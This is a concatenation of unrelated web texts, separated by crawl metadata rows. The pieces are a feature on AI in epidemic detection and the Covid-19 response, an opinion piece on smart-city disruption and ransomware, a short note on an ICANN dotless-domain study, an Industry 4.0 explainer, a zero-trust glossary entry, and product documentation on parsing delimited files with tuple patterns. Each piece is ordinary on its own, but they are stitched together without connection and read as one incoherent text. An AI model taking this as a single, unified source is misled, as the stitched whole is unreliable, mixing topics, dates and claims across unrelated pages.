Since 2000, there has been warning after warning: SARS (SARS-CoV) in 2003, H1N1 “swine flu” influenza in 2009, MERS (MERS-CoV) in 2012, West African Ebola in 2014, Zika in 2015, and numerous re-emergences of diseases such as cholera, dengue, yellow fever and, even, plague.
Global leaders have ignored repeated warnings from experts and organisations, such as Dennis Carroll (in the early 2000s) and Bill Gates. The head of the World Health Organisation (WHO), Tedros Ghebreyesus, warned in 2018: “A devastating epidemic can start in any country at any time, and kill millions of people, because we are not prepared.”
Artificial intelligence can help governments prepare their readiness for the next epidemic with computer modelling and simulations in the same way AI helps prepare nations for war through AI for military simulation and AI for military readiness.
In a 2015 TED Talk titled The next outbreak? We’re not ready, Bill Gates used computer models to predict that a pathogen as virulent as the 1918 Spanish flu would kill 33 million people worldwide in just nine months. Gates laments that governments regularly conduct war simulations to test their preparedness, “war games”, but not pandemic simulations, “germ games”.
The international community has belatedly started assessing countries’ readiness for coping with pandemics. The first Global health security index was published in October 2019. Data collection was largely manual, with researchers asking yes or no questions. Countries were scored between zero and 100, with higher scores denoting better health conditions. The US came top, with a score of 83.5, and the UK second, scoring 77.9. Retrospective evaluation of each country’s readiness for Covid-19 will highlight if pandemic readiness testing needs to be more sophisticated than this in the future.
In the past 50 years, more than 1,500 new pathogens have been discovered, 70% of which have proved to be of animal origin, according to WHO (2018) statistics. Virus or bacterial infections that “spillover” from animals to humans are called “zoonotic”. Spillover might occur when an infected animal is eaten, trafficked, farmed or bites a human, and where human activity encroaches on or destroys habitats.
Artificial intelligence can help predict the conditions and locations where spillovers of known and unknown pathogens might occur. This allows governments and agencies to plan ahead and ban or educate against high-risk activities.
The leading force in identifying zoonotic threats was Predict, set up by Dennis Carroll in 2009. It estimated that there are 1.6 million unknown viral species in animals, of which 700,000 could infect humans. Predict’s funding was withdrawn by the US government in October 2019.
Prompted by the emergence of the Zika virus in 2015, Predict started developing machine learning to help predict possible hosts for emerging Flavivirus (the family containing Zika, dengue and yellow fever), says Pranav Pandit, a researcher at the One Health Institute based at University of California School, who helped develop the tools for Predict.
Spillover is very rare, stresses Kate Jones, professor of ecology and biodiversity at UCL. It takes a unique cocktail of bad luck for a human to interact with a particular animal that is contagious with a virus that is capable of infecting a human and being passed human to human.
This is what makes AI useful for predicting what, when, why and where these rare events might occur.
Jones’s team has built machine learning models to predict where animals pinpointed as likely carriers of Ebola are likely to exist, where human behaviour, such as deforestation, brings animals and humans into dangerous proximity, and where population density and mobility risks greater spread. Jones is also experimenting with AI-enabled sensors and cameras that can detect the presence of animals – including potential hosts or “reservoirs” of zoonotic diseases – in close proximity to humans.
The first stage of outbreak analytics is detection. Quick detection is crucial because it enables early intervention – including patient isolation, contact tracing, treatment and vaccination (if available) – and the delivery of local and global alerts to prevent spread.
In a perfect world of ubiquitous, connected, affordable global healthcare – as advocated by the WHO – an infected person quickly receives medical attention and details of the illness are shared into a global, AI-enabled data system that can provide advice, summon assistance and issue warnings in real time.
The handling of the outbreak of SARS-CoV2 in Wuhan in December 2019 was a long way off this scenario. Chinese authorities – despite their developed health system – were too slow to detect, recognise or publicise the threat.
Regardless of the secrecy, news of the new pathogen emerged. Several AI systems picked up on the internet chatter about a cluster of unidentified pneumonia cases in Wuhan and issued alerts, regardless of silence from the Chinese authorities. Dataminr claims to have been first to issue an alert (only to its clients) on 30 December 2019, having picked up chatter on social media, including an image of deep cleaning taking place at the now-notorious Wuhan market. Other paid-for services such as BlueDot and Metabiota also claim that their natural language processing (NLP) algorithms were quick to pick up on the news, according to reports.
The first public alerts were also issued on 30 December, according to Associated Press. First was an automated alert from HealthMap, based at Boston Children’s Hospital, which mines numerous feeds for information. The other was a more considered alert issued by ProMED, after New York epidemiologist Marjorie Pollack had been notified by talk of the “unexplained pneumonia” cases via old-school email from China.
Healthmap and BlueDot helped to predict the spread of the virus internationally by mining data of flights leaving Wuhan during the crucial period after outbreak and before travel restrictions were brought in.
A great deal of focus has been given to forecasts of spread, rates of infection, incubation, recovery and death, and peaks and decline of the Covid-19 coronavirus. Notably, predictions by the team at Imperial College, London, are credited for rapidly changing the UK government’s strategy from “wait and see” to introducing intervention, such as social distancing. These models have traditionally been mathematical and do not tend to use AI.
However, researchers from Fudan University in Shanghai have used the Covid-19 outbreak in China as a case study to test and prove that AI makes better real-time predictions for transmission than traditional epidemiological forecasting models. Their first study used a stacked auto-encoder for modelling the transmission dynamics of the epidemic in China. A second paper used AI to predict the consequences of governments delaying making interventions on the spread of the virus.
The SARS-CoV2 genome was sequenced rapidly by Chinese researchers and published in draft on 10 January 2020. The SARS-CoV2 genome has been sequenced innumerable times since from samples around the world.
Deep learning is used in genomic sequencing and diagnostic testing, to process large datasets and to spot variations in the code, as outlined in this November 2019 research paper, but isn’t clear how extensively AI was used in sequencing the SARS-CoV2 genome.
There are many reasons why fast genome sequencing is important. The first is that most tests for the SARS-CoV2 virus in patients rely on identifying part of the virus genome in a nose or throat swab.
The second reason is to allow researchers – see this research paper, for example – to compare genomes, including looking for similarities with previous coronavirus pathogens such as SARS and MERS and with animal coronavirus found in suspected host species such as bats and pangolin. Also, studying the tiny mutations that occur in the virus genome every two to three weeks helps to track when and where it emerged.
Finally, the viral genome is key to tracking viral spread. Nextstrain is an open source project that analyses all virus genomes from around the world to use the tell-tale mutations or “phylogeny” to track the spread of the epidemic. It has collated 1,500 genomes for SARS-CoV2, producing impressive maps showing the colour-code strains spread locally and globally. Analysis of the US shows how different strains have been criss-crossing the country.
While Nextstrain looks like a poster child for AI and big data, it isn’t today, says Richard Neher, a professor at Biozentrum, University of Basel, and one of the founders of Nextstrain. “Some of the algorithms involved in genome sequencing do use AI – various neural network architectures,” he says. “But there’s none currently at our end.”
Shortages of tests – particularly in the west – have highlighted issues with genome-based testing. Two very different examples of AI-enabled testing have emerged from China.
The Chinese authorities in Beijing have introduced AI-enabled thermal-imaging cameras, developed by Megvii, in crowded places such as train stations and airports to help identify people with a high temperature. Even at a distance of more than three metres in a crowded location, with people wearing masks or hats, the system can rapidly identify the forehead and recognise if a person is giving off too much heat, then, using image recognition, flag them to an official who can then check their temperature manually. A high temperature is a symptom of Covid-19. It’s no substitute for a full test, but certainly has advantages.
At the other end of the spectrum, a deep learning model has been used to accurately identify cases of Covid-19 from CT scans of patients’ chests. In a study published in March 2020, a neural network, known as COVNet, was able to examine 4,300 CT scans and accurately distinguish between patients with Covid-19 and other community-acquired pneumonia and lung diseases.
Several Chinese companies have developed similar CT scan recognition technologies, honed in Wuhan. These include Infervision, which has recently been deployed in an Italian hospital. A Canadian startup, DarwinAI, recently made its CT scan reading technology open source.
Prior to testing and even to symptoms, there is a period when the patient is unknowingly contagious and can pass on the virus. The standard way to deal with this is through contact tracing, to establish to whom the infected person could have passed the disease and alert, test, treat and/or isolate those contacts.
Contact tracing was a big part of the containment strategy in Singapore. Once a person tests positive, Singapore interviews the infected person and attempts to track every person they have interacted with in the one to two weeks prior to testing positive. Initially, this appears to be a largely manual process, but in March 2020 the country introduced a phone app called TraceTogether (now available open source) which uses Bluetooth to log all close interactions with other app users. If one app user develops Covid-19, all at-risk individuals and the authorities can be alerted.
The extent to which Korea’s comprehensive contact tracing system uses AI is also unclear. However, this paper shows that Korea uses personal data records, including hospital and pharmacy visits, GPS data, credit card transactions and CCTV, which is allowed under special rules enacted following the MERS outbreak in 2015.
From early February 2020, China rapidly rolled out a Close Contact Detector app across the country to control Covid-19. It works on a traffic light system. At railway stations, venues, and so on, you have to scan the app or officials check the app and only allow people in if the app shows a green light. The system behind the app is shrouded in secrecy, but it appears to rely on some sophisticated AI.
An expat resident tells Computer Weekly that on returning to Shanghai Airport from abroad in February, he and his companion had to download the app. They then took a taxi home. Just 15 minutes after returning to their apartment, health officials and police knocked on the door. They took their temperatures and politely explained they must self-quarantine for two weeks and asked them to sign documents saying they understood.
“In the morning, I went to buy a coffee nearby,” he explains, not having understood the strictness of rules. “Within an hour, the police and health officials were knocking on the door again. They knew exactly where I had been from the phone.
“They didn’t fine me. They explained it was my civic duty and warned me not to do it again. I apologised and thanked them. It was a bit scary, but I fully support it and I’m happy they did it. This is how they track the virus. It works. It has helped China win the battle against Covid-19,” he adds.
Information and control of misinformation
In any disaster it is essential to get the correct information to citizens, data to organisations, and curtail fake news and scams. Bad information can kill, as demonstrated by the hundreds of people who died unnecessarily in Iran from drinking methanol, believing it to be a coronavirus cure.
AI can help provide correct information and curtail the dissemination of the bad. Google, Facebook and other search and social media giants have tweaked their algorithms and pumped up the lie detectors on their platforms in an effort to promote legitimate information and eliminate misinformation. To searches related to Covid-19, Google surfaces data from national governments and health organisations, rather than the usual popular posts and paid-for messages from advertisers.
An interesting example of many new information services is the WhatsApp Health Alert developed by Praekelt.org for South Africa and now rolled out by the WHO. It is a multi-language service using machine learning and natural language understanding to answer users’ questions and steer them to the best resources. The WHO service attracted 12 million users in the first week.
The level of data sharing by governments, agencies, hospitals, research institutions and all manner of organisations is unprecedented. This enables the build of innovative data-led services, including the king of Covid-19 stats, Worldometer, which enables the researchers who are modelling the outbreak projections, the medical researchers who are striving to devise and test new treatments, and the computer scientists who are building the AI tools that will facilitate them all.
One of the key and cutting-edge ways that AI is used in healthcare is computational drug repurposing. In this process, researchers use deep learning technologies to search through huge databases of existing drugs – such as Drugbank – many approved by the US Food and Drug Administration, to find potential remedies to new problems. The hope is that AI can be trained to find viral inhibitors – either vaccines or treatments – in the same way that researchers at MIT used deep neural networks to find a potential new antibiotic to fight bacterial infections such as E. coli.
AI can help predict if potential drugs will prevent the virus binding with human cells, if the drug is likely to be toxic to human cells, and if it could cause a dangerous interaction with other common drugs, thereby helping to pre-screen potential drugs before lab testing.
Many labs globally are working on developing AI or using AI to investigate and test potential drugs. These include the MIT lab behind the aforementioned antibiotic. There are many pre-published papers – that is, with no peer review – where researchers have claimed drug discoveries using AI such as this one from Insilico and this one from Michigan State University.
Being prepared for next time
In the years to come, analysis of the Covid-19 outbreak and national and global responses will be extensive and possibly damning. One positive thing to come from this will undoubtedly be the recognition of the role that AI plays and should play in preparedness for and dealing with global epidemics.
Read more about AI and infectious disease epidemics and pandemics
- Coronavirus: Mobilising data science.
- Coronavirus: How data visualisation could build resilience against future pandemics.
- How Asia’s tech firms are helping to stem the Covid-19 outbreak. | <urn:uuid:127e4340-e28b-47a8-ae5d-9de18ec5742d> | CC-MAIN-2022-40 | https://www.computerweekly.com/feature/Coronavirus-the-role-of-AI-in-the-war-against-epidemics-and-pandemics | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00361.warc.gz | en | 0.955258 | 3,556 | 3.109375 | 3 |
Cities must use technology to make better, more educated decisions about the future while increasing transparency and communication.
It looks like 2020 will be a year of reckoning for buzzword-bingo digital technologies. For some time, U.S. citizens have been promised that their tax dollars were being invested in artificial intelligence and machine learning platforms that would make their lives easier. After nearly a decade of broken promises, the public isn’t going along with it anymore.
In this “always-on” age, city residents are demanding more efficient digital services. They expect public agencies to act more like consumer brands and have become less tolerant of service disruptions. But with every step cities take toward digital transformation, the threat of disruptions -- from cybersecurity attacks to natural disasters -- increases.
The balancing act for cities in 2020 is to recognize all the risks of disruption caused by digitalization and continue their own digital transformation -- all while the global economy is slowing and investment is getting harder to come by. The answer lies in using technology to make better, more educated decisions about the future while increasing transparency and communication.
Threats and disruptions
With every bus line that gets electrified and every neighborhood that gets Wi-Fi, the opportunity for disruption grows. Natural disasters like wildfires and hurricanes can take out multiple services in one fell swoop. But slower trends, like population growth or a particularly rainy season that leads to heavy vegetation, can also burden systems to the point of an outage.
And then there is the human element. One misguided click could lead to a massive breach of residents’ data or to a city's 911 system being held hostage by ransomware. Since 2018, ransomware attacks have shuttered city governments from Atlanta (a successful attack by two Iranian hackers and a good example of how geo-politics can affect cities) to Baltimore to 22 towns in Texas. Some of these attacks shut down mission-critical services like the court system and law enforcement.
That costly trend is only going to grow in 2020. Lloyds estimates that New York City could face over $2.3 billion in cyber-related losses this year. But even more concerning is the possibility of a loss of life, which hasn’t happened yet, but could be on the horizon.
As threats increase and the global economy slows, cities will have to narrow their priorities in 2020. With these competing demands, what is really going to move the needle for smart cities and where should they prioritize their investments?
Simulations for a smarter tomorrow
Time to value is more important than ever when it comes to smart city investment strategies. Products that help cities simulate, prepare for and mitigate future threats are key.
Cities need the ability to forecast conditions a year, five years and even further out so they can best use their resources today for a smarter tomorrow. That’s the kind of runway municipalities need to make broad changes such as fortifying the grid or developing an extensive vegetation management program. Organizing labor and capital for massive projects like those takes more than one season. Digital transformation tools, particularly the internet of things, give cities more data to make more informed decisions about the future to prevent disruption and mitigate threats.
Data must be collected from as many sources as possible, which requires more than one product. Think of it like a mosaic. Cities must mix and match solutions that analyze different data to get a full picture. Sometimes they invest in one or two, but that’s not enough to get actionable information. Statistics-based prognostic capabilities are the key driver -- that’s how to get the best holistic picture of what’s going to happen.
Cities should also invest in services and solutions with industry-specific expertise. These will provide the best understanding of the challenges and dynamics of how systems work and deliver the most accurate forecasting to drive smarter decision-making.
Communication conquers the “unknown unknown”
No matter how much data-driven simulating and forecasting is done, there is always the “unknown unknown.” So how do smart cities use digital transformation to protect themselves from blowback from the public when the inevitable, unforeseeable disruption occurs? Communication.
East Coast utilities have been fined for their handling of hurricane damage -- not because of the response time or length of outages, but because they didn’t have the level of communication that their customer base demanded. The proper use of the right digital tools would have helped, such as a text message alerting users to an updated system and/or a responsive presence on social media to answer customer questions. Talking to people on the platforms they use about the steps being taken to manage a crisis and offering the best estimates of service restoration goes a long way. Even if repairs are not happening right in front of residents, they still want to know that officials are working on it. Communication and transparency are key.
Working together to solve shared challenges
This will be the year the public’s expectations bring back an appreciation for expertise. Cities will see more threats because of their modernization efforts but will also have the opportunity to mitigate damage with digital technology.
The most important lesson is that these threats are not unique. Every city struggles to balance the pros and cons of digital transformation and faces the same natural and human threats. No city exists in a silo.
The smartest cities will band together to meet these challenges with investments and shared best practices in cybersecurity, long-term predictive simulation and transparent communication inside and outside city limits. The more open and transparent vendors, utilities, telecoms and other industries that make up the modern city infrastructure are with each other, the easier and safer all our ecosystems will be.
NEXT STORY: Taking on AI bias | <urn:uuid:01534a76-6591-48a0-a901-b1bf574a804e> | CC-MAIN-2022-40 | https://gcn.com/state-local/2020/01/2020-the-year-of-reckoning-for-smart-cities/314661/?oref=gcn-next-story | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337680.35/warc/CC-MAIN-20221005234659-20221006024659-00361.warc.gz | en | 0.945284 | 1,163 | 2.703125 | 3 |
Making small changes to complex high availability systems can have extreme consequences. When these systems provide critical services to the entire planet – like, say, the Domain Name System – even minor changes must be analyzed very carefully.
That’s why ICANN hired us to perform a study on the security and stability implications of a proposed deployment of dotless domain names, or dotless generic Top Level Domains. Allowing dotless names would allow independent third parties to operate web sites like “http://search/” or “https://bank/”
No dots. Seems simple, right? Our study covers the breadth and scope of the entire Domain Name System, from the technology used to the people consuming the technology.
You can view the ICANN post about the study, with a link to our report, here: http://www.icann.org/en/news/announcements/announcement-05aug13-en.htm | <urn:uuid:71e2796e-a5bd-4718-911c-5ac2b9c4f211> | CC-MAIN-2022-40 | https://carvesystems.com/news/look-ma-dotless-domain-names/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00361.warc.gz | en | 0.889682 | 196 | 2.515625 | 3 |
What Is Industry 4.0?
Industry 4.0 definition: Industry 4.0, also known as the “Fourth Industrial Revolution”, refers to the wide-scale adoption of new technologies in manufacturing—like the Internet of Things, smart machines, and automation—to improve business efficiencies.
What Is Industry 4.0?
Industry 4.0 is a term that has been used with more frequency since the early 2010s, when a German government communication used it to describe an action plan for fully automating and computerizing auto factories.
The term caught on, and now virtually everyone in manufacturing is familiar with the concept, which has since expanded to become one of the biggest drivers of technological change in the sector.
Unsurprisingly, the biggest uptake of Industry 4.0 has come from industries that have traditionally been forward-thinking in their approach to technology adoption—notably auto manufacturing; aerospace; and food and beverage.
Where Does the “4.0” Come From?
If you’re wondering why it’s the fourth, the first (and most famous) Industrial Revolution of course took place in the 19th century with the advent of steam power and machinery.
The Second was before World War I, when railroads, sewer systems, telegraph systems, and gas and water works came about, in addition to a boon from steel manufacturing.
The Third is what we more commonly call the Digital Revolution during the latter half of the last century, which saw the widespread commercialization and use of personal computers and other electronics.
And now we have the Fourth, or Industry 4.0, which has been precipitated by large-scale advances in automation and connected devices across a digitized global supply chain.
What Does Industry 4.0 Matter?
Industry 4.0 matters because, beneath all the buzzwords and business-speak, its associated applications are beneficial to practically any manufacturing firm, from small and midsize businesses to large enterprises.
Organizations that have adopted and implemented Industry 4.0 practices into their businesses have thrived, while those that haven’t quickly find themselves as laggards, unable to keep pace with their more digitally-astute competitors.
The reasons for this are quite simple: many aspects of technology that Industry 4.0 encompasses are beneficial and cost-effective for manufacturers, whether it’s productivity, efficiency, or just simply reducing on wasteful expenditures like unnecessary labor costs or preventable equipment costs.
So, let’s take a look at what all of this actually means in a practical sense—what does Industry 4.0 look like on the factory floor?
Core Aspects of Industry 4.0
The humble sensor may not seem like much, but these devices—and with the growth and expansion of smart sensors—are some of the biggest drivers for the entire industry.
Manufacturers don’t adopt technology so that they can boast about how digital they are, they do it because implementing things like smart sensors have very clear and tangible advantages that give an immediate boost to a business.
The global smart sensor market size is expected to grow from $36.6 billion in 2020 to $87.6 billion by 2025, at a CAGR of 19.0%.
Sensors are widely and increasingly used by organizations for a variety of purposes, but let’s take a look at condition monitoring as an example of their use.
A sensor that is used for the purposes of condition monitoring will report raw data instantly through a cloud system, typically an ERP, which will then analyze and report actionable data to a manager.
As the data is compiled and reported in real-time and without the need for input from a human, you can be alerted if there is an issue with a machine, which can then be scheduled for downtime and fixed before it evolves into a larger—and far more expensive—problem.
Analytics for your supply chain
The total data in the world today is incalculably larger than it was 10, 5, or even one year ago.
In 2018, it was estimated that there were 18 zettabytes in the world. By 2025, this figure is expected to reach 175 zettabytes.
To place that into context, 1 zettabyte is approximately 1 trillion gigabytes.
This rapid growth of data has led to what we now call “big data”, which in business terms refers to the mountains of data that organizations have under their roofs.
Up to 73% of company data is unused by businesses
The question for businesses then is how can they best use that data to serve their customers and their organization?
And this is where supply chains and analytics comes hand-in-hand with big data.
With the right solution, you can put your data to use by having an automated system crawl your data, giving you actionable results which can inform your business decisions.
The number of supply chain professionals who say they’re currently using predictive analytics at their company grew 76% from 2017 to 2019
You can use analytics to help you spot trends, such as over- or understocked warehouses, seasonal upturns or downturns, products that are performing better than others, and many other factors.
Automation, at least as far as manufacturing goes, is likely to conjure familiar images of robots building cars or articles predicting job losses at a high-tech plant.
The reality is that while physical, automated robots have seen a rapid increase in adoption among manufacturers—notably food and beverage manufacturers—you’re just as likely to find software robots performing tasks alongside human counterparts.
Technology like robotic process automation (RPA) has seen a sharp upwards trend in adoption from SMBs, in part due to the reduced costs of implementation to previous years, but mostly because of the improvement they can have on existing business processes.
Decision makers are increasingly keen to implement RPA in their organizations, with up to 40% of larger enterprises adopting some kind of RPA software by this year, up from 10% in 2018.
We’ve already spoken about how ERPs use automation tech to report data to decision makers from sensors.
Well, the same technology can be used to serve other functions, too, whether it’s tracking freight, customer service, or administrative tasks. Work processes and functions can be streamlined through software automation.
Internet of Things
Finally, we have the Internet of Things (IoT), which serves as a central component of a successful Industry 4.0 strategy.
Industry 4.0 is defined by improving the interconnectivity of organizations. Meaning, in essence, that devices—whether it’s smart sensors, tablets, or machines—are all connected to the cloud under one network.
This allows devices to communicate and work in tandem with one another, inputting data onto the cloud and reporting back to you.
First wave IIoT adopters on average experience a 30% increase in productivity
The integration of IoT into digital platforms is making smarter, faster, and more nimble manufacturing operations that can respond fluidly to conditions in organizations.
This will also support increased discrete manufacturing capabilities—that is, make-to-order production which has been historically seen as an unsustainable business model.
- Industry 4.0 refers to the implementation of new technology in manufacturing operations.
- Adoption among businesses, particularly SMBs, is quickly becoming one of the main distinguishing factors between successful companies and laggards.
- The core principles of Industry 4.0 are implementing automation, the use of smart devices, connectivity between devices, and the analysis which can be performed using data from those devices.
Subscribe to our blog to receive more insights into business technology and stay up to date with marketing, cybersecurity, and other tech news and trends (don’t worry, we won’t pester you). | <urn:uuid:59fa7ee0-dd54-4b79-af61-d1c422c9107e> | CC-MAIN-2022-40 | https://www.impactmybiz.com/blog/what-is-industry-4-0-manufacturing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00561.warc.gz | en | 0.953507 | 1,635 | 3.1875 | 3 |
Zero-Trust (Perimeterless Security)
The Zero-Trust Security Model is built around the premise of “never trust, always verify,” which means that devices are not trusted by default, even if they are connected to your own managed network and were previously verified.
The traditional security model which involves trusting devices or those that connect to it via a VPN, within a corporate perimeter makes little sense in distributed computing environments today.
Thus, the zero trust model promotes mutual authentication and checking the identity and integrity of devices regardless of their location. It also provides access to applications and services based on the device identity, device health, and user authentication.Back to Glossary | <urn:uuid:69e72c2b-267b-4f4c-a95f-13787ec40218> | CC-MAIN-2022-40 | https://abusix.com/glossary/zero-trust-perimeterless-security/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00561.warc.gz | en | 0.965016 | 137 | 2.875 | 3 |
Delimited File Sources¶
Use the delimited file data source (DF) to extract data from plain text files like these:
Comma-separated values files (CSV files). With this data source, the delimiter can be a comma or any other character.
Files that have a more complex structure that can be represented with a regular expression (e.g. application log files).
Fixed-width files. That is, files in which the columns do not have delimiters and instead, each column has a fixed width.
To create a new DF (delimited file) data source, right-click on the Server Explorer and click New > Data source > DF
The Tool will display the dialog to create the data source.
The following data are requested:
Name. Name of the new data source.
Data route. Path to the delimited file. The formats of the available paths are described in detail in the section Path Types in Virtual DataPort. The path can be parameterized using interpolation variables (see section Paths and Other Values with Interpolation Variables).
If the selected “Data route” is Local or FTP / SFTP / FTPS Client and the route points to a directory, the base views created over this data source will retrieve the data from all the files in the directory and not just one file. The data in all the files must have the same schema.
When the route points to a directory but you only want to process some of the files in this directory, enter a regular expression that matches the names of these files, in the File name pattern box. For example, if you want the base view created over a data source to return the data of all the files with the extension
loglocated in the folder
C:\log_files, set the “Local path” to
C:/log_filesand the “File name pattern” to
(.*)\.log. Note that “File name pattern” is a regular expression and not a file pattern. That is why “.” is prefixed with “" (in a regular expression, the dot matches any character unless is prefixed by a slash).
To retrieve data from files that use a date-based naming convention (as is usual in log files), use the
^DateRangeinterpolation function. See the section Paths Using Date Ranges to learn to use this function.
Ignore route errors. If selected, the data source will ignore the errors occurred when accessing the file(s) to which the data source points.
This main goal of this option is to ignore files that cannot be found, when the data source points to a collection of files and you know some of them may be missing. For example, you can create a DF data source to read a set of log files with this local path:
See more about “DateRange” in the section Paths Using Date Ranges.
When you query a base view created over this data source, the data source will read all the log files in order. For example, if in the query you put the condition
start_date='2018/05/01' AND end_date = '2018/05/04', the data source will try to read the files “http_access_2018-05-01.log”, “http_access_2018-05-02.log”, “http_access_2018-05-03.log” and “http_access_2018-05-04.log”. If one these files is missing, the query will fail.
If you want to ignore this error, select the check box Ignore route errors. With this option if one of the files does not exist, the data source will skip it and read the next one. If you run the query from the administration tool, you can identify which files could not be read in the Execution trace: in the trace, click on the nodes with Type = Route. The ones that could not be read will have the attribute Exception followed by an error message.
To Process CSV Files
To process a comma-separated values file (a CSV file), select Use column delimiter and in the box Column delimiter, enter the character that separates the values. Note that the delimiter can be a comma or another character. If you enter two or more characters, the behavior depends on the check box Delimiter consists of multiple characters:
If it is selected and the delimiter has two or more characters, the values have to be separated by these characters. For example, if you enter
-|-, the file has to have this structure:
value 1-|-value 2-|-value 3-|-value4
If it is cleared and the delimiter has two or more characters, all these characters will be considered a delimiter. For example, if you enter
,|, every time the data source finds the character comma (,) or the vertical bar (|), it will consider the beginning of a new field.
You have to enter the “invisible” characters in a special way. See the table below:
The text qualifier is the double quote (“).
To Process Files With A Complex Structure (Regular Expression)
To process a file with a complex structure that can be represented with a regular expression, select Use tuple pattern and enter a regular expression in Tuple pattern. This is useful to process log files because usually, they have a fixed structure.
This regular expression specifies the format of one row of data within the file. This expression has to match the whole line of the file (or multiple lines), not only the part that you want to capture. The fields of the views created over this data source will be the capturing groups of the regular expression. For example:
(\d\d\d\d)-(\d\d)-(\d\d) - (.*)
The syntax of these regular expressions is the one defined by the Java language (the documentation of the Java class Pattern lists the constructs of these expressions).
The section Examples of How to Define a Tuple Pattern below has several examples of data sources with Tuple Pattern.
To Process Fixed-Width Files
To process a file in which the values have a fixed-width, select Use fixed length and provide the following values:
Column widths (bytes). Comma-separated list of integers. Each integer is the column size in bytes. E.g. if the file has seven columns, you have to enter 7 integers separated by a comma.
Note this is the width in bytes, not characters. Take this into account when processing files that have multi-byte characters. For example, “例” only has one character but it is made of two bytes.
Pad character. In fixed-width files, a value is padded - usually with spaces - if it does not use all the bytes allotted to it (there is extra spaces). If in this file, the values are padded with a character that is not space, select Use custom value and enter this character. If you enter more two or more characters, all of them will be considered pad characters.
Replace character. The character that the data source returns for values that cannot be represented in the specified charset. For most files, you can leave Use default value (whitespace) selected. If you enter a custom value, enter a single character.
This option rarely applies except in situations where the file has an unexpected encoding. Let us say the data source has column width = “1,1” (two columns of one byte each), you selected the encoding “UTF-8”, and when the data source reads the file the first character of a value is multi-byte. In this case, the first byte of a multi-byte character may not correspond to any character and if this happens, the data source will replace this with a space or the character you entered.
Alignment. The alignment of the values (left or right) when the values have padding.
End of line delimiter. Character string to be used to mark the end of a tuple. The default value is
To indicate the end of line, use
\r\`n, regardless of the operating system in which Virtual DataPort runs.
For fixed-width files, you can leave this parameter empty. If there are no end of lines in this file, leave this box empty.
Start of data zone delimiter. Java regular expression identifying the position in the file where the data source has to start retrieving data (or obtaining the header if the Header option is selected). If empty, the search will start at the beginning of the file.
Start delimiter from variable. If selected, the “Start of data zone delimiter” will be considered the name of an interpolation variable that, at runtime, will contain the “Data zone delimiter”.
Include start delimiter as data. If selected, the text matching the “Start of data zone delimiter” expression will be included in the search space.
End of data zone delimiter. The data source will stop retrieving data from the file when it finds this string. If empty, the data source will continue retrieving data until the end of the file.
Include end delimiter as data. If selected, the text matching the “End of data zone delimiter” expression will be considered in the results.
Header. If selected, the data source considers that the first line of the data region contains the names of the fields in this file. These names will be the fields’ names of the base views created from this data source.
Header pattern. Java regular expression used to extract the name of the fields that form the header. This only needs to be specified if the header has a different structure than the data. This option can only be used when the “Header” option is selected.
Ignore matching errors. If selected, the data source will ignore the lines of this data file that do not have the expected structure. I.e. rows that do not have the expected number of columns or, if you are providing a tuple pattern, rows that do not match the pattern.
If you clear this check box, the data source will return an error if there is a row that does not have the expected structure. When you select this check box, you can check if the data source has ignored any row in a query. To do this, execute the query from the Administration Tool. Then, click “View execution trace” and click the “Route” node. You will see the attribute “Number of invalid tuples”.
In the Metadata tab, you can set the folder where the data source will be stored and provide a description.
When editing the data source, you can also change its owner by clicking the button .
Click Save to create the data source.
Then, click Create base view to create a base view associated with the new data source. If the path to the data file includes interpolation variables, you will have to provide a value for them (the section Paths and Other Values with Interpolation Variables explains how to create paths to files with variables).
The Tool will display the schema that the base view will have. At this point, you can change the name of the view and the name and type of its attributes. In the Metadata tab, click Browse to select the folder where the new base view will be stored. Then, click Save ().
In the Server Explorer, double-click the new base view to display its schema. Click Edit to open the edition wizard of the view. In this wizard, you can change the name and type of the base view.
Examples of How to Define a Tuple Pattern¶
This section contains two examples of delimited-file data sources that are defined with a Tuple Pattern. Although in these examples we use a static value, the value of Tuple Pattern can be an interpolation variable (see the section Paths and Other Values with Interpolation Variables for more information about interpolation variables).
Example 1 of tuple pattern: Let us say that we have a file that
contains product information in the following format (note that the
discount attribute is optional):
product_name=Acme Laptop Computer;price=1500 euro;discount=50 product_name=Acme Desktop Computer;price=1000 dollar
The following pattern can be used to extract from each row the following information about each product:
Price and currency
Discount. For the tuples without a discount value, the value of this cell will be
Example 2 of tuple pattern: Let us say that we want to extract the
name of the files (not directories), its date and its size, from the
output of the Windows command
11/07/2007 10:10 <DIR> .dbvis 09/18/2008 15:09 <DIR> .eclipse 01/19/2011 16:55 <DIR> .gimp-2.6 11/10/2009 18:43 215 .ITLMRegistry 03/26/2010 14:16 3.498 .keystore 05/18/2010 17:56 <DIR> .m2 02/02/2010 15:23 <DIR> .maven 03/26/2010 14:01 <DIR> .netbeans 02/02/2011 19:20 <DIR> .smc_cache 06/15/2010 09:59 <DIR> .ssh 10/14/2009 13:26 <DIR> .thumbnails 02/15/2010 12:06 0 .Xauthority 01/16/2008 12:02 517 ant.install.log 02/11/2010 13:29 <DIR> Application Data 07/16/2010 08:51 772 build.properties 02/18/2008 15:19 <DIR> Contacts 01/14/2011 10:02 190 default-soapui-workspace.xml 02/07/2011 11:44 <DIR> Desktop 04/01/2009 15:11 <DIR> Favourites 08/22/2008 12:50 <DIR> Start Menu 01/27/2011 17:18 <DIR> My Documents 02/12/2009 12:36 201 osdadmin.ini 01/14/2011 10:02 7.958 soapui-settings.xml 02/09/2010 10:02 22.358 temp.txt 02/10/2011 09:22 <DIR> Tracing 03/05/2010 09:41 0 vdpws.log 04/17/2009 09:49 <DIR> workspace
The “Tuple pattern” has to be:
The base views created with this tuple pattern will have three fields: the date of the file, its size and its name.
Paths Using Date Ranges¶
When you need access to files that use a date-based naming convention
(as is typical in log files), use the
function to consider only the files between a given start date and a
given end date.
The syntax of the
^DateRange function is the following:
^DateRange ( pattern of the date range : text , start date : text , end date : text , pattern of the files : text )
Pattern of the date range: pattern of the parameters
end date. This pattern follows the syntax specified by the class SimpleDateFormat of the Java API.
